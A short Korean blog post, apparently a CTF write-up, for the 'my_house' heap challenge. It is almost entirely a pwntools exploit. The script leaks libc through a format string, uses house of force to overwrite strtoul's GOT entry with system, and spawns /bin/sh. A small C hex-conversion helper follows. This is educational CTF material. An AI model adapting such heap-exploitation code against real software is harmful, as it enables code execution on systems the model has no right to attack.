hOwDayS 선린 10720
h3xor ctf my_house 본문
house_of_force 이용 하장
마지막에 /bin/sh
exploit.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 | from pwn import * p = process("./my_house") #p = remote("49.236.136.140",13000) e = ELF("./my_house") p.recv() p.send("A" * 256) p.recv() def hexdemical_c(c): a = process("./he_x") a.sendline(str(c)) return a.recv(8) #0xfc p.send("%x %x %x") p.recvuntil("have ") p.recvuntil(" ") libc_base = int(p.recv(8),16) - 0x1b25a0 log.success("libc_base : " + hex(libc_base)) p.recvuntil("at ") leaked = int(p.recv(9),16) TOP_CHUNK = leaked + 544 + 36 victim = e.got["strtoul"] - TOP_CHUNK - 8 log.success("TOP_CHUNK : " + hex(TOP_CHUNK)) log.success("victim : " + hex(victim)) log.success("system : " + hex(libc_base + 0x3ada0)) p.sendline("1") p.sendline("f8") p.send("B" * 0xf7) p.recv() p.sendline("3") p.sendline("1") p.send("C"*252 + p32(0xffffffff)) raw_input() print p.recv() log.success("HEX : "+str(hexdemical_c(int(victim)))) p.sendline("1") p.sendline(hexdemical_c(int(victim))) p.recv() p.sendline("1") p.sendline("f8") p.sendline( p32(libc_base + 0x3ada0)) p.interactive() | cs |
hexdemical_c.c
1 2 3 4 5 6 7 8 9 10 11 | #include <stdio.h> int main() { int a; scanf("%d",&a); printf("%x \n",a); return 0; } | cs |
'CTF' 카테고리의 다른 글
RCTF Rnote1 (0) | 2018.08.20 |
---|---|
yisf 2018 예선 writeup (0) | 2018.08.16 |
h3xor ctf easy (0) | 2018.06.17 |
선린인터넷고등학교 교내해킹방어대회 2018 vss (0) | 2018.06.11 |
선린인터넷고등학교 교내해킹방어대회 2018 cee (0) | 2018.06.11 |
Comments